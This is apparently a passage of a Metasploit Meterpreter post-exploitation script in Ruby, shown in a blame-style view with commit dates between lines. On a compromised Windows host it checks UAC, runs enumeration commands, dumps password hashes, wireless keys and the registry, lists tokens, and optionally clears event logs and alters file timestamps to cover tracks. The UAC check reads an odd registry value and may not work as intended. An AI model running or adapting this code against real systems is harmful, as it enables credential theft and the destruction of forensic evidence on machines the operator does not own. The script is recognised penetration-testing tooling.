#---------------------------------------------------------------------------------------------------------
|
|
|
|
#Function for Checking for UAC
|
|
|
|
def uaccheck(session)
|
|
|
|
uac = false
|
|
|
|
winversion = session.sys.config.sysinfo
|
|
|
|
if winversion['OS']=~ /Windows Vista/ or winversion['OS']=~ /Windows 7/
|
|
|
|
if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
|
|
|
|
begin
|
|
|
|
print_status("Checking if UAC is enabled .....")
|
|
|
|
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
|
|
|
|
if key.query_value('Identifier') == 1
|
|
|
|
print_status("UAC is Enabled")
|
|
|
|
uac = true
|
|
|
|
end
|
|
|
|
key.close
|
|
|
|
rescue::Exception => e
|
|
|
|
print_status("Error Checking UAC: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return uac
|
|
|
|
end
|
2009-01-08 18:14:03 +00:00
|
|
|
################## MAIN ##################
|
|
|
|
|
2009-11-05 00:40:19 +00:00
|
|
|
# Execute Functions selected
|
|
|
|
if (mg != nil)
|
|
|
|
migrate(session)
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
2009-11-05 00:40:19 +00:00
|
|
|
# Main part of script, it will run all function minus the ones
|
|
|
|
# that will chance the MACE and Clear the Eventlog.
|
|
|
|
print_status("Running Windows Local Enumerion Meterpreter Script")
|
|
|
|
print_status("New session on #{host}:#{port}...")
|
|
|
|
|
|
|
|
# Header for File that will hold all the output of the commands
|
|
|
|
info = session.sys.config.sysinfo
|
|
|
|
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
|
|
|
|
header << "Running as: #{client.sys.config.getuid}\n"
|
|
|
|
header << "Host: #{info['Computer']}\n"
|
|
|
|
header << "OS: #{info['OS']}\n"
|
|
|
|
header << "\n\n\n"
|
|
|
|
print_status("Saving report to #{dest}")
|
|
|
|
filewrt(dest,header)
|
|
|
|
filewrt(dest,chkvm(session))
|
|
|
|
trgtos = info['OS']
|
|
|
|
uac = uaccheck(session)
|
|
|
|
# Run Commands according to OS some commands are not available on all versions of Windows
|
|
|
|
if trgtos =~ /(Windows XP)/
|
|
|
|
filewrt(dest,list_exec(session,commands))
|
|
|
|
filewrt(dest,wmicexec(session,wmic))
|
|
|
|
filewrt(dest,findprogs(session))
|
|
|
|
dumpwlankeys(session,logs,filenameinfo)
|
|
|
|
filewrt(dest,gethash(session))
|
|
|
|
elsif trgtos =~ /(Windows .NET)/
|
|
|
|
filewrt(dest,list_exec(session,commands))
|
|
|
|
filewrt(dest,wmicexec(session,wmic))
|
|
|
|
filewrt(dest,findprogs(session))
|
|
|
|
filewrt(dest,gethash(session))
|
|
|
|
elsif trgtos =~ /(Windows 2008)/
|
|
|
|
filewrt(dest,list_exec(session,commands + win2k8cmd))
|
|
|
|
#filewrt(dest,wmicexec(session,wmic))
|
|
|
|
#filewrt(dest,findprogs(session))
|
|
|
|
if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
|
|
|
|
print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
|
|
|
|
else
|
2009-05-22 02:33:33 +00:00
|
|
|
filewrt(dest,gethash(session))
|
2009-11-05 00:40:19 +00:00
|
|
|
end
|
|
|
|
elsif trgtos =~ /(Windows Vista)/ or trgtos =~ /(Windows 7)/
|
|
|
|
filewrt(dest,list_exec(session,commands + vstwlancmd))
|
|
|
|
filewrt(dest,wmicexec(session,wmic))
|
|
|
|
filewrt(dest,findprogs(session))
|
|
|
|
if not uac
|
|
|
|
dumpwlankeys(session,logs,filenameinfo)
|
|
|
|
else
|
|
|
|
print_status("UAC is enabled, Wireless key Registry could not be dumped under current privileges")
|
|
|
|
end
|
|
|
|
if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
|
|
|
|
print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.")
|
|
|
|
else
|
2009-05-22 02:33:33 +00:00
|
|
|
filewrt(dest,gethash(session))
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
2009-11-05 00:40:19 +00:00
|
|
|
elsif trgtos =~ /(Windows 2000)/
|
|
|
|
filewrt(dest,list_exec(session,commands - nonwin2kcmd))
|
|
|
|
filewrt(dest,gethash(session))
|
|
|
|
end
|
2009-01-08 18:14:03 +00:00
|
|
|
|
2009-11-05 00:40:19 +00:00
|
|
|
#filewrt(dest,gethash(session))
|
|
|
|
filewrt(dest,listtokens(session))
|
|
|
|
if (rd != nil)
|
|
|
|
if not uac
|
|
|
|
regdump(session,logs,filenameinfo)
|
|
|
|
filewrt(dest,"Registry was dumped and downloaded")
|
|
|
|
else
|
|
|
|
print_status("UAC is enabled, Registry Keys could not be dumped under current privileges")
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
2009-11-05 00:40:19 +00:00
|
|
|
end
|
|
|
|
if (cm != nil)
|
|
|
|
filewrt(dest,"EventLogs where Cleared")
|
|
|
|
if trgtos =~ /(Windows 2000)/
|
|
|
|
covertracks(session,cmdstomp - nowin2kexe)
|
|
|
|
else
|
|
|
|
if not uac
|
|
|
|
covertracks(session,cmdstomp)
|
2009-01-30 06:18:02 +00:00
|
|
|
else
|
2009-11-05 00:40:19 +00:00
|
|
|
print_status("UAC is enabled, Logs could not be cleared under current privileges")
|
2009-01-30 06:18:02 +00:00
|
|
|
end
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
2009-06-20 16:15:46 +00:00
|
|
|
end
|
2009-11-05 00:40:19 +00:00
|
|
|
print_status("Done!")
|